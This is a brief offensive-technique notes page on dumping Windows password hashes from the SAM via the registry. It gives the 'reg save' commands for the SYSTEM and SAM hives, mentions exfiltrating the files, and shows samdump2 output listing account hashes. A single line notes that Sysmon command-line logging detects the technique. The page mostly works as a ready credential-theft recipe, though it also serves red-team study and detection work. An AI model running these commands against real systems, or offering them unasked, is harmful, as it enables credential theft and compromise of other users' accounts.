Dumping Hashes from SAM via Registry
Security Accounts Manager (SAM) credential dumping with living off the land binary.

Execution

Dumping the registry hives required for hash extraction:
1
reg save hklm\system system
2
reg save hklm\sam sam
Copied!
Once the files are dumped and exfiltrated, we can dump hashes with samdump2 on kali:
1
[email protected]~/tools/mitre/pwdump# samdump2 system sam
2
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
3
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
4
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f288c9a9aee917e19d4b21928b98268:::
5
low:1003:aad3b435b51404eeaad3b435b51404ee:4bdaf9484819a077562ebeefaed6ca75:::
Copied!

Observations

Sysmon logs with commandlines will reveal credential dump attempts from the registry as expected:
Last modified 1yr ago
Copy link